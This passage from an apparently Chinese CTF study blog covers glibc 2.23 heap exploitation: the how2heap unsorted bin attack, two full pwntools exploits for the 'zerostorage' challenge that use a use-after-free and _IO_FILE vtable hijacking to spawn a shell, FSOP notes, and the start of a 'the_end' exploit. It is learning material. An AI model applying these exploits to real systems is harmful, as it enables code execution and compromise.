"glibc was disabled, or because the buffers are bigger than 0x408 bytes. See build_glibc.sh for build "
"instructions.\n");
fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");

unsigned long stack_var=0;
fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);

unsigned long *p=malloc(0x410);
fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
"the first one during the free()\n\n");
malloc(500);

free(p);
fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
"point to %p\n",(void*)p[1]);

//------------VULNERABILITY-----------

p[1]=(unsigned long)(&stack_var-2);
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

//------------------------------------

malloc(0x410);
fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
"rewritten:\n");
fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
}

这个的原理也是借助于unsortedbin上的卸链表的操作,当unsortedbin上有chunk,时,卸链表操作有一个:
bck->fd=unsorted_chunks (av);
在这里,我们首先把chunk的bk改成了栈指针,所以在获取bck的时候bck就会是一个栈地址,然后malloc在unsortedbin上成功匹配到chunk之后,即使没有去接着malloc chunk,对应栈地址+2*sizt_t的地方也会填上main_arena的地址,这也是这个利用和上面那个利用不一样(不用修改size字段)的原因

这两个都不难我这里就不debug了,直接撸题吧

zerostorage

程序说实话好像逆起来有点复杂,直接看流程更清晰明了

程序分析(流程)

bss段上存了一个记录结构体数组,这个结构体主要是用来管理对应chunk的,分别记录了表示use_or_not的flag、可用长度还有指针(xor了一个随机的mask,导致真正的指针没有存在bss段)

Insert

找记录数组看还有没有剩余的位置,最多记录0x20个

输入的lenth不能小于0

len>0x1000 calloc(0x1000) read(0x1000)///set ent->len=0x1000
if 0x80<=len<=0x1000 calloc(len) read(len)///set ent->len=len
len<0x80 calloc(0x80) read(len)///set ent->len=len

然后就差不多是读ent->len长度的数据了,这里的比对操作差不多就是为了申请的chunk在0x80~0x1000之间,

update

input(index)

check(index>0x1F,ent->use_or_not)
input(len) check(len>0)
if len>0x1000 a=0x1000 c=0x1000
if 0x80<=len<=0x1000 a=len c=len
if len<0x80 a=0x80 c=len
这个也是为了控制大小在0x80~0x1000之间

if ent->len>=0x80 b=ent->len
else b=0x80

if a!=b realloc(ptr_mask^ent->ptr,a)

readn(ptr,c)
然后更新记录

merge

need ent_num>1
input(fromID) check(fromID>0x1F,mergechunk1.use_or_not)
input(toID) check(toID>0x1F,mergechunk2.use_or_not)
a=0x80,b=0x80
if fromlen+tolen>=0x80 b=fromlen+tolen
if tolen>=0x80 a=tolen

if a==b cpy_len=fromlen
else realloc(to_ptr,b) cpy_len=fromlen
memcpy(chunk_toptr + to_len, from_ptr, cpy_len);
把from的数据拷到新的chunk里对应的位置去

更新一个新的记录
free(from_ptr)
清除掉合并的两个记录

delete

这个就很简单了就是input然后check然后free,并清除掉记录

input(id) check(id>0x1F,use_or_not)
free(ptr) clear record

view

view就是按记录的长度,输出chunk上长度为n的内容

input(id) check(id>0x1F,use_or_not)
write_n

list

输出对应记录的下标和记录下来的长度

漏洞分析

这个题我最开始看了很久主要是因为真的太乱了,特别是前面比来比去的操作,而且我当时没记笔记有点蠢,以后这种比来比去的操作直接记笔记,这样可以知道程序到底是为了干什么

然后漏洞的话基本上第一眼看上去溢出和leak都不行,毕竟什么记录之类的也都在free之后清除了,申请的时候使用的也是calloc,然后再仔细就会发现如果merge中输入的fromID和toID相等的话就会形成UAF,比如先calloc 3个0x90的chunk然后delete第二个,merge(0,0)的话就会把第一个chunk合并成一个0x120的chunk存在记录[1]处,然后free掉这个0x120的chunk,由于是在unsortedbin上所以可以在之前再free一个,设置这个chunk的fd指向那个chunk,再去view的时候就可以leak heap和libc了,而且也可以通过update来更改chunk中的内容

由于这种题是第一次接触,自己也还傻傻不清楚unsortedbin attack怎么用,所以参考了一些师傅们的题解,然后发现这种方法可以用来修改global_max_fast这个变量,然而在我参考的过程中发现,由于原题环境是在ubuntu14系统下,当时还存在一个获取libc地址之后直接获取程序地址的操作,所以原题的思路是在bss段伪造一个堆块,然后把bss给malloc出来,获得mask之后修改指针实现任意地址写。但是在ubuntu16下面这个操作已经不存在了,所以又照着新解学习了很多_IO_FILE的知识

学了FSOP再来分析漏洞,此时已经有了libc地址和heap地址,还更改了global_max_fast,接下来如果使用FSOP的话应该怎么用呢…我第一个想到的还是fastbin attack(写完第一个思路之后回来发现师傅还有一个思路,简直不能再爽23333,所以我这里写了两个解法),之前fastbin attack能修改__malloc_hook主要是因为存在0x7f这个特殊值,但是现在就似乎变得更棘手了一些堆块又不能大于0x1000,又不能小于0x80

….不过果然只要细心一点找还是找的到fake size的,如图

我在stderr对应的FILE中找到了一个0xfb的fakesize,这个本来是FILE的flag值,但是既然你有个0xfb我就不客气的拿下了….distance也是足够的,只要劫持你到我堆上伪造的vtable就完事了

Exploit1

接着上面的想法我成功的跑通了自己的思路奥利给!(还是那句话,用自己的方法写出来真的太开心了23333)

  1. 首先就是先多申请几个chunk,其中一个大小是0x74
  2. merge 0x74的chunk,这时候能merge出来一个0xf0的chunk
  3. 再弄一个merge自己的chunk,此时在unsortedbin链中这个chunk的fd是我们之前0xf0的chunk,bk是unsortedbin,达到leak,而且由于这个chunk是unsortedbin链头,所以这个也刚好用来改global_max_fast
  4. 然后把0xf0的chunk从unsortedbin calloc出来,为了后面的fastbin attack(毕竟是UAF的chunk,我们有两个记录可以用来改它2333)
  5. 把第三步merge自己的chunk也calloc出来,这步只是为了改global_max_fast
  6. delete之前的0xf0的chunk,然后改fd(fastbin attack)
  7. 这里注意再insert的时候就可以把fake vtable放上去了,为了等下用
  8. 再insert就是改写_IO_2_1_stderr_的东西了,注意计算对应于fakechunk的偏移
  9. 退出getshell

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
p.recvuntil('Your choice: ')
p.sendline('1')
p.recvuntil('Length of new entry: ')
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def update(id,size,content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
p.recvuntil("Length of entry: ")
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def merge(fromid,toid):
p.recvuntil('Your choice: ')
p.sendline('3')
p.recvuntil('from Entry ID: ')
p.sendline(str(fromid))
p.recvuntil('to Entry ID: ')
p.sendline(str(toid))
def delete(id):
p.recvuntil('Your choice: ')
p.sendline('4')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
def view(id):
p.recvuntil('Your choice: ')
p.sendline('5')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x80,'c'*0x80)#2
insert(0x74,'d'*0x74)#3 这里的chunk是为了merge自己之后能有一个0xfx的size,便于后面利用
insert(0x80,'e'*0x80)#4
insert(0x80,'f'*0x80)#5

delete(4)#这里如果不先delete4的话会因为realloc中free了这块空间从而被double free
merge(3,3)
delete(1)
merge(0,0)

view(1)
p.recvuntil(':\n')
heap_base=my_u64(p.recv(8))-0x1b0
libc_base=my_u64(p.recv(8))-0x3c4b78
loginfo('heap_base',heap_base)

fakechunk_offset=0x3c553b
pad_len=0xcd#到vtable指针的距离


update(1,0x110,p64(0)+p64(libc_base+g_m_f-0x10)+'a'*0x100)
insert(0xe0,'+'*0xe0)
insert(0x110,'*'*0x110)

delete(0)
update(4,0xe8,p64(libc_base+fakechunk_offset)+'0'*0xe0)
insert(0xe0,p64(0)*3+p64(libc_base+0x4526a)+'.'*0xc0)

#这里要计算各种偏移,而且是对fakechunk来说的,所以显得有些繁琐?..没事,getshell天下第一
payload='.'*0x15+p64(0)+p64(1) #满足 _IO_write_ptr(0x28偏移) > _IO_write_base(0x20偏移)
payload=payload.ljust(pad_len,'\x00') #满足0xc0偏移的_mode要<=0
insert(0xe0,(payload+p64(heap_base+0x1c0)).ljust(0xe0,'\xee'))

p.sendline('7')#trigger
p.interactive()

Exploit2

修改global_max_fast之后我本来是只想到了利用fastbin attack,但是发现好像有一个更牛逼的操作:

因为fastbin的限制现在变的特别大了,所以如果我们的chunk足够大的时候可以直接将chunk的地址填到别的地方去而不是fastbin的那个数组…这应该也算是数组越界的一个应用了,太顶了
如下(这是main_arena之后的可写数据段,一下就看到了一些熟悉的东西,而且指不定还有什么可以改,只要咱们的chunk够大2333):

师傅们的操作是改了_IO_list_all,然后在对应chunk上伪造一个FILE,这里说一下写EXP自己踩的几个坑

  1. leak的时候unsortedbin上是有两个chunk的,所以干脆把链尾的那个chunk弄成0x400后面merge的时候可以直接取下来,省去了再insert的步骤,然后把fake_err和fake table都update到0x1000的那个chunk里面去
  2. 前面0x1000的chunk和0x400的chunk直接挨着就好
  3. _IO_list_all指向的是chunk header,但是我们写的时候是从data段开始写的,所以要注意这里少0x10个偏移,前面0x10的数据也用不了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
p.recvuntil('Your choice: ')
p.sendline('1')
p.recvuntil('Length of new entry: ')
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def update(id,size,content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
p.recvuntil("Length of entry: ")
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def merge(fromid,toid):
p.recvuntil('Your choice: ')
p.sendline('3')
p.recvuntil('from Entry ID: ')
p.sendline(str(fromid))
p.recvuntil('to Entry ID: ')
p.sendline(str(toid))
def delete(id):
p.recvuntil('Your choice: ')
p.sendline('4')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
def view(id):
p.recvuntil('Your choice: ')
p.sendline('5')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x1000,'d'*0x1000)#2
insert(0x3f0,'e'*0x3f0)#3
insert(0x3f0,'f'*0x3f0)#4
insert(0x80,'g'*0x80)#5

delete(3)#delete for leak&merge

delete(1)#delete for merge
merge(0,0)
view(1)#leak

heap_off=-0x1130
libc_off=-0x3c4b78
p.recvuntil(':\n')
heap_base=heap_off+u64(p.recv(8))
libc_base=libc_off+u64(p.recv(8))
loginfo("heapbase",heap_base)
loginfo("libcbase",libc_base)

fake_err=''.ljust(0x10,'\x00')+p64(0)+p64(16)+p64(0)*7#offset-0x10 because '_IO_list_all' will point to the chunk header
fake_err+=p64(libc_base+0x3c5620)+p64(2)+p64(0xffffffffffffffff)+p64(0)+p64(libc_base+0x3c6770)
fake_err=fake_err.ljust(0xc0,'\x00')+p64(0)
fake_err=fake_err.ljust(0xc8,'\x00')+p64(heap_base+0x200)

fake_table=p64(0)*3+p64(libc_base+0x4526a)


update(2,0x1000,(fake_err+fake_table).ljust(0x1000,'\x00'))#update to fake err FILE

merge(4,2)#merge to 0x1410 and unsortedbin have only one chunk now because of the UNLINK

update(1,0x100,p64(0)+p64(libc_base+g_m_f-0x10)+'2'*0xf0)#update for next insert to change global_max_fast

insert(0x110,'\x33'*0x110)#change global_max_fast

delete(0)#delete 0x1410chunk

p.sendline('7')


p.interactive()

FSOP学习

由于刷how2heap时碰到了一题zerostorage,这个题在ubuntu14上由于存在一个offset2lib的攻击,所以在泄露libc地址之后可以get到程序的地址,但是我复现这个题是在ubuntu16下面做的,所以这个攻击方法无效XD,得另寻他路,所以我找到了raycp师傅的这篇文章,上面提到了FSOP这个攻击姿势,理所当然我当然要啃一啃了,顺带借助了一下CTFwiki和师傅的另一篇博客

FILE *

首先来看一下FILE这个结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */

struct _IO_marker *_markers;

struct _IO_FILE *_chain;

int _fileno;//fd
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */

#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];

/* char* _save_gptr; char* _save_egptr; */

_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

_IO_FILE_plus&_IO_jump_t

还有FILE结构体的封装和vtable,当然最最主要的就是这个指针和这个table了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable;
};
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};

调用链

table中对应函数的调用姿势会尝试着慢慢更新的,现在菜鸡学到的有这几种:

  1. 利用的是在程序调用 exit 后,会遍历 _IO_list_all ,调用 _IO_2_1_stdout_ 下的 vatable_setbuf 函数(wiki)

  2. puts 在源码中实现的函数是_IO_puts,这个函数的操作与 fwrite 的流程大致相同,函数内部同样会调用 vtable 中的_IO_sputn,结果会执行_IO_new_file_xsputn,最后会调用到系统接口 write 函数。(wiki)

  3. printf 调用栈(wiki):

    1
    2
    3
    4
    5
    6
    vfprintf+11
    _IO_file_xsputn
    _IO_file_overflow
    funlockfile
    _IO_file_write
    write

    自己试出来的几种,有些不同都是得自己去看源码啊(跪),好像和上面比起来没有看到那个overflow:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    ► f 0     7ffff7b042b0 write(没有setbuf,输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a8647d _IO_file_xsputn+669
    f 5 7ffff7a5a92d vfprintf+1981
    f 6 7ffff7a62899 printf+153
    f 7 40053e main+24

    ► f 0 7ffff7b042b0 write()(setbuf(stdout,0),输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44

    ► f 0 7ffff7b042b0 write(没有setbuf,输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a89196 _IO_flush_all_lockp+374
    f 5 7ffff7a8932a _IO_cleanup+26
    f 6 7ffff7a46f9b __run_exit_handlers+139
    f 7 7ffff7a47045
    f 8 7ffff7a2d837 __libc_start_main+247

    ► f 0 7ffff7b042b0 write(setbuf(stdout,0),输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44
  4. exit->__run_exit_handlers->_IO_cleanup->_IO_flush_all_lockp
    控制stdinstdout或者stderr中实现fp->_mode <= 0以及fp->_IO_write_ptr > fp->_IO_write_base同时修改vtable里面的_IO_OVERFLOW为one gadget(来自raycp师傅的博客)

  5. 程序结束时在_dl_fini_中调用_rtld_global结构体的__rtld_lock_lock_recursive(来自raycp师傅的博客),准确来说这个不算FILE里面的,不过还是写一下记一下比较好

自己的调试代码

调试之前写了一个有0x40个a的test.txt(用python -c写进去的,因为无论用vim还是gedit好像都会在保存时自动加一个换行符,比较搞,用cat test.txt|hd就可以看到结尾是不是有换行符)

然后用下面的代码调试了一下…调试细节先放着,这个是帮我用来探索前面几个指针是怎么用的,还有很多细节其实都不太清楚,以后玩源码的时候再来看(结果写题的时候就发现直接用gdb p一下那个符号好像更明确….我佛了,不行就加上(_IO_FILE_plus *)转换一下地址的类型,这样看来代码写的好像多余了2333333)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>

void printFILE(FILE * tmp)
{
fprintf(stderr, "_flags:%#x\n",*(int*)((unsigned int)tmp+offsetof(_IO_FILE,_flags)));
fprintf(stderr, "_IO_read_ptr:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_read_ptr)));
fprintf(stderr, "_IO_read_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_read_end)));
fprintf(stderr, "_IO_read_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_read_base)));
fprintf(stderr, "_IO_write_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_write_base)));
fprintf(stderr, "_IO_write_ptr:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_write_ptr)));
fprintf(stderr, "_IO_write_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_write_end)));
fprintf(stderr, "_IO_buf_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_buf_base)));
fprintf(stderr, "_IO_buf_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_buf_end)));
fprintf(stderr, "_IO_save_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_save_base)));
fprintf(stderr, "_IO_backup_base:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_backup_base)));
fprintf(stderr, "_IO_save_end:%p\n",*(char**)((unsigned int)tmp+offsetof(_IO_FILE,_IO_save_end)));
fprintf(stderr, "_markers:%p\n",*(struct _IO_marker **)((unsigned int)tmp+offsetof(_IO_FILE,_markers)));
fprintf(stderr, "_chain:%p\n",*(struct _IO_FILE **)((unsigned int)tmp+offsetof(_IO_FILE,_chain)));
fprintf(stderr, "_fileno:%#x\n",*(int*)((unsigned int)tmp+offsetof(_IO_FILE,_fileno)));
fprintf(stderr, "_flags2:%#x\n",*(int*)((unsigned int)tmp+offsetof(_IO_FILE,_flags2)));
fprintf(stderr, "_old_offset:%#x\n",*(_IO_off_t *)((unsigned int)tmp+offsetof(_IO_FILE,_old_offset)));
fprintf(stderr, "_cur_column:%#x\n",*(unsigned short *)((unsigned int)tmp+offsetof(_IO_FILE,_cur_column)));
fprintf(stderr, "_vtable_offset:%#x\n",*(signed char *)((unsigned int)tmp+offsetof(_IO_FILE,_vtable_offset)));
fprintf(stderr, "_shortbuf:%#x\n",*(char *)((unsigned int)tmp+offsetof(_IO_FILE,_shortbuf)));
fprintf(stderr, "_lock:%#x\n\n",*(unsigned int*)(_IO_lock_t *)((unsigned int)tmp+offsetof(_IO_FILE,_lock)));

fprintf(stderr, "vatable*:%p\n\n",*(unsigned int **)((unsigned int)tmp+sizeof(_IO_FILE)));
}
int main(){
fprintf(stderr, "Let's see what FILE* have(x64):\n");
fprintf(stderr, "The fopen will malloc a chunk to store the FILE structure and return a ptr to the structure chunk");
fprintf(stderr, "Let's do fopen\n");
FILE *f=fopen("test.txt","r+");
fprintf(stderr, "And we can see what exactly the structure have at the beginning:\n");
printFILE(f);

fprintf(stderr, "Then we read something from the file(0x20)\n");
char buffer[0x30]={0};
fread(buffer,1,0x20,f);
fprintf(stderr, "buffer<%s><%#x>\n",buffer,strlen(buffer));
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

memset(buffer,0,0x30);
strcpy(buffer,"bbbbbbbbbbbbbbbb");
fprintf(stderr, "Then we write something to the file('b'*0x10)\n");
fwrite(buffer,1,strlen(buffer),f);
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

fprintf(stderr, "Try fflush\n");
fflush(f);
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

memset(buffer,0,0x30);
fprintf(stderr, "Read again(0x20)\n");
fread(buffer,1,0x20,f);
fprintf(stderr, "buffer<%s><%#x>\n",buffer,strlen(buffer));
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

memset(buffer,'*',0x30);
fprintf(stderr, "Write again('*'*0x20)\n");
fwrite(buffer,1,0x20,f);
fprintf(stderr, "Now the FILE looks like:\n");
printFILE(f);

fflush(f);

fclose(f);
fprintf(stderr, "Now the FILE looks like(Use after free):\n");
printFILE(f);
return 0;
}

其中最主要的大概是fopen时malloc了一个0x230的chunk来存放结构体,然后第一次调用fread时分配了一个0x1000的文件缓冲区,第一次会把文件的全部内容都读到这个缓冲区里面(正确与否有待深究,自己看来暂时是这样)

1582612886398

_chain域的链接此时结构大概是:_IO_list_all->f->_IO_2_1_stderr_->_IO_2_1_stdout_->_IO_2_1_stdin_->NULL

其中_IO_list_all是一个变量,存储着指向f结构体的指针(以上图为例就是0x603010),f在fopen操作时初始化的FILE*就被链入了这个链表

再就是fclose会直接把对应的两个chunk一起释放了,释放顺序是先释放文件缓冲区再释放结构体chunk

Hijack

至于vtable在_IO_FILE_plus中的偏移量,摘自wiki就是:在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8(wiki)

如果我们伪造一个vtable,然后修改对应FILE结构体的vtable指针指向我们伪造的vtable,就可以达到劫持程序的目的(不得不说vtable大法好啊23333)

目前 libc2.23 版本下,位于 libc 数据段的 vtable 是不可以进行写入的。不过,通过在可控的内存中伪造 vtable 的方法依然可以实现利用(wiki)

vatble对应的段属性如下所示,在不可写段:

1582618757197

(wiki上面关于修改vtable的描述已经很详细了,这里不再赘述,主要是以记笔记为主)

因为 vtable 中的函数调用时会把对应的_IO_FILE_plus指针作为第一个参数传递,因此这里我们把 “sh” 写入_IO_FILE_plus 头部。之后对 fwrite 的调用就会经过我们伪造的 vtable 执行 system(“sh”)
(或者直接试着填one_gadget

leak

(来自raycp师傅的博客)

控制stdout结构体满足以下条件实现任意泄露:

  • _IO_write_base指向想要泄露的地方。
  • _IO_write_ptr指向泄露结束的地址。
  • _IO_read_end等于_IO_write_base以绕过多余的代码。 满足这三个条件,可实现任意读。当然不包含结构体里的_flags字段的伪造,该字段都从原来的结构体里面复制过来,所以就没去分析该如何构造了。

Arbitrary write

(来自raycp师傅的博客)

_IO_write_end 大于_IO_write_ptr时,memcpy就会调用

只需要将_IO_write_ptr指向需要写的地址,_IO_write_end指向结束位置即可

有了任意读与任意写之后,具体实现就是使用任意读泄露libc地址,然后用任意写将one gadget写到malloc_hook中,然后利用%n报错或者是较大的字符打印来触发malloc函数

the_end

只看概念当然不代表会用了,肯定要写个题印象才深23333

程序分析

1582615573201

程序逻辑非常简单,就是给了一个libc地址,然后任意地址写5次,一次一字节,但是程序开启了PIE和Full RELRO,无法改写程序段的内容,这里我由于是第一次写FILE类型的题,所以就参考了师傅们的WP学了很多(看完的感触就是挖洞果然撸源码是王道啊….)

当然还有从各路师傅那听来的Ex师傅的博客,真的学到了不少东西

Exploit1

第一种办法是修改stdin/stdout/stderr任一FILE的vtable指针指向我们可控的区域,由于ubuntu libc2.23存放vtable的段不可写,所以不能直接改vtable。改指针的时候也特别巧妙,改的是指针第二个字节,所以可以在可写的段再去找合适的偏移,当然这里的解法都是参考raycp师傅学的新姿势,所以更清晰明了的解释就推荐去看原博主的文了

这个方法里面一共改了三处,5次:
第一处:stdin/stdout/stderr任一FILE的 _IO_write_ptr,使其大于_IO_write_base
第二处:对应vtable指针第二字节,改写的地址对应偏移需要有libc地址
第三处:对应偏移处有libc地址,修改低三字节

可能自己接触比较新的就是在libc找合适的地方去改地址
我用的命令是 search -p 0x7fxxxx -w,在GDB里面可以直接找到可写的而且有这个地址的内存,然后通过我们需要的偏移比对哪个地址是我们需要的,因为vtable里面是存在偏移的,如果实在是找不到可能就失败了,当然找到的概率还是很大的,毕竟师傅们的利用都这么多了XD

ps:原来这个就是FSOP,开始还以为FSOP是更深一点的知识,然后点开wiki的FSOP之后发现就是这个23333,一举两得?

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
